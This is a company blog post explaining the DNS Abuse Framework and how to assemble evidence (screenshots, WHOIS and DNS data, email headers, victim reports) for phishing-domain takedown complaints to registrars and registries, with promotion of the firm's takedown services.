The Domain Name System (DNS) is designed to connect to users and services effortlessly. However, this system is exploited by bad actors for malicious purposes, generally known as DNS Abuse. Understanding what constitutes DNS Abuse, specifically phishing, and knowing how to present evidence to Registrars and Registries is critical for getting these properties removed quickly and efficiently.
Too often, users with legitimate complaints against phishing domain names fail to provide sufficient evidence for the Registrar or Registry to make an informed decision. Since it is not their responsibility to investigate the details of a case, it falls on the complainant to present clear, compelling evidence that leaves no doubt the reported domain constitutes abuse under the DNS Abuse Framework. Let’s take a look at how you can submit a slam dunk phishing complaint.
What Is DNS Abuse?
DNS Abuse is defined by the DNS Abuse Framework as any activity involving domain names that fall into these categories:
- Phishing: Deceptive practices that trick users into sharing sensitive information like passwords or financial details.
- Malware: Software designed to disrupt, damage, or gain unauthorized access to systems.
- Botnets: Networks of infected devices used for malicious activities.
- Pharming: Redirecting users to fraudulent websites without their consent.
- Spam (when tied to abuse): Bulk email used to deliver phishing, malware, or other malicious payloads.
The DNS Abuse Framework establishes a shared understanding for registrars and registries to detect and address these abuses. Registrars and registries are obligated to act against DNS Abuse but are limited to cases where the abuse clearly fits these definitions.
The Role of Registrars and Registries
Registrars and registries can take decisive action only when the abuse clearly meets the DNS Abuse Framework’s criteria. This ensures due process and avoids penalizing legitimate registrants. Actions they can take include:
- Suspending the domain name.
- Disabling DNS resolution to prevent access.
- Working with the registrant to address compromised domains.
Phishing Under the DNS Abuse Framework
Phishing is one of the most common forms of DNS Abuse. It typically involves:
- Domains designed to impersonate legitimate brands or services.
- Deceptive websites or emails that collect sensitive user data.
- Misleading links that redirect users to fraudulent sites.
Phishing domain names are often registered in bulk and can include both branded and generic names. These domains are typically newly registered and frequently use WHOIS privacy services to conceal the registrant’s identity.
When a phishing domain name complaint is submitted, the DNS Abuse Framework requires registrars and registries to act on specific, credible evidence to ensure fair treatment of domain registrants and prevent unwarranted suspensions. Unfortunately, the framework is sometimes misused to target legitimate websites, making it important for registrars and registries to evaluate each case with care and precision. This places the onus on the complainant to provide clear, unambiguous evidence of the phishing attack. It is not the job of the evaluator to investigate your case, so the complainant needs to provide the required evidence to make a determination.
When Website Content Abuse Becomes Phishing: Navigating the DNS Abuse Framework
The DNS Abuse Framework clearly distinguishes between DNS Abuse and Website Content Abuse, setting a higher threshold for intervention by registrars and registries. Website Content Abuse, such as trademark infringement, counterfeit goods, and brand impersonation, typically falls outside the scope of DNS Abuse. Registrars and registries are not obligated to act on Website Content Abuse unless it violates their Acceptable Use Policies (AUPs) or a court order is presented. This separation is intentional, as Website Content Abuse often involves subjective legal interpretations that vary across jurisdictions, unlike DNS Abuse, which has more universally accepted definitions.
However, there are instances where Website Content Abuse can cross into phishing and therefore qualify as DNS Abuse under the framework. This occurs when the content on the website is used to deceive users into providing sensitive information. For example, if a site impersonates a legitimate brand and hosts a fake login page or payment portal, it moves beyond mere impersonation into phishing. Collecting user credentials, passwords, or payment information through deception is a hallmark of phishing. Another example is if a site solicits users to enter personal details under the guise of verification, contests, or promotions. In these cases, the registrar or registry may be required to act, as the domain now fits the definition of phishing under the framework. To trigger action, the complainant must provide specific and credible evidence of this phishing activity, such as screenshots of the fake login page, customer complaints, or logs showing user data being collected.
Proving a Domain Fits the Definition of Phishing
To ensure a registrar or registry can confidently take action against a domain, there are evidence pieces that are considered important in an assessment. Here’s are the key elements of proof to build a compelling case:
Deceptive Content:
- Screenshots or records of the domain/site mimicking a legitimate brand (e.g., logos, layout, or text). Providing a comparison of the legitimate and phishing site can assist in establishing impersonation.
User Interaction Evidence:
- Proof that the domain is collecting sensitive user data (e.g., login pages or payment forms). This is important information to include in any evidence pack. You can examine the HTML source code, and form submission actions to identify phishing kits and other interesting intelligence.
- Examples of fraudulent emails or messages directing users to the domain are crucial evidence. Screenshots of these messages are highly valuable, and gathering multiple examples from different sources will strengthen your claim. Including the email header, if possible, is recommended, as it provides pathway information and other critical intelligence. You can also provide email logs demonstrating phishing campaigns originating from or linked to the domain.
Technical Evidence:
- WHOIS data showing registrant information that may indicate malicious intent (e.g., patterns of abuse across multiple domains). An important data point is the date of registration. New registrations are a big indicator.
- DNS records indicating connections to known phishing infrastructure. Cybersecurity experts identify DNS connections to phishing infrastructure by analyzing A, CNAME, and MX records, reverse DNS, SSL certificates, and WHOIS data, cross-referencing threat feeds like PhishTank, AbuseIPDB, and OpenPhish to detect shared infrastructure and suspicious IPs.
- Deeper evidence helps. Cybersecurity experts can discover user interaction evidence by analyzing the website’s structure, network traffic, and form actions using tools like browser DevTools, Burp Suite, and headless browsers to trace sensitive data collection. They can identify phishing kits through directory scanning, WHOIS/DNS analysis, and malware analysis to locate files like
submit.php
andconfig.php
that handle stolen user data.
Customer Reports:
- Complaints from users who have been misled or harmed by the domain. This can be in email form from the impacted user. This information should be verifiable if needed.
- Proof of financial losses or data breaches linked to interactions with the domain. This can be in form of financial records.
Remove Phishing Content Quickly and Effortlessly with Unphish
Sign up for Unphish and experience best in class takedown service
Types of Evidence Needed
When reporting phishing, it’s essential to present evidence in a structured manner. In order to prove the domain name is a phishing property designed to defraud consumers, were are some examples:
Visual Evidence:
- Screenshots.
- Copies of phishing emails or SMS messages.
Transactional Records:
- Bank or payment receipts.
- Evidence of unauthorized payments processed via the website.
Technical Reports:
- Logs showing phishing-related traffic or behavior.
- Connections to blacklisted IPs or other flagged domains.
Third-Party Verification:
- Reports from security tools or organizations confirming the domain’s involvement in phishing.
- Verification from trusted notifiers with expertise in phishing detection.
Partnering with an Experienced Enforcement Agency for DNS Abuse Takedowns
Using an experienced enforcement agency like Brandsec can significantly improve the success rate of DNS abuse takedowns. Registrars and registries require precise, verifiable evidence before taking action, and many complaints are rejected due to insufficient proof. Brandsec’s expertise ensures that every case is supported by comprehensive evidence, such as screenshots, WHOIS data, DNS records, and user complaints. Their familiarity with the DNS Abuse Framework means complaints are formatted correctly, clearly demonstrating how the domain meets the criteria for phishing abuse.
Brandsec’s established relationships with registrars and registries further accelerate the takedown process. Unlike general complaints that may be deprioritized, reports from trusted enforcement agencies like Brandsec are given higher credibility and faster attention. Their use of advanced detection tools and connections to phishing intelligence databases allows them to uncover linked domains and persistent threat actors, ensuring broader protection. By partnering with a trusted enforcement agency, businesses can reduce the risk of delays and increase the likelihood of swift, decisive action against abusive domains.
Summary
Phishing is a serious threat, and the DNS Abuse Framework provides a structured process for addressing it. However, registrars and registries require specific, credible evidence to act confidently. By understanding what constitutes DNS Abuse and providing robust evidence of phishing activity, registrants and affected parties can effectively escalate cases and secure timely resolution.
Whether you’re a brand owner, security professional, or affected user, knowing the framework and evidence requirements is key to making the internet a safer place for everyone.
About brandsec
brandsec is a team of highly experienced domain name management and online brand protection experts. We provide corporate domain name management and brand enforcement services, helping brands eliminate phishing platforms across the internet. Supporting some of the largest brands in the region, we offer innovative solutions to combat threats across multiple industries.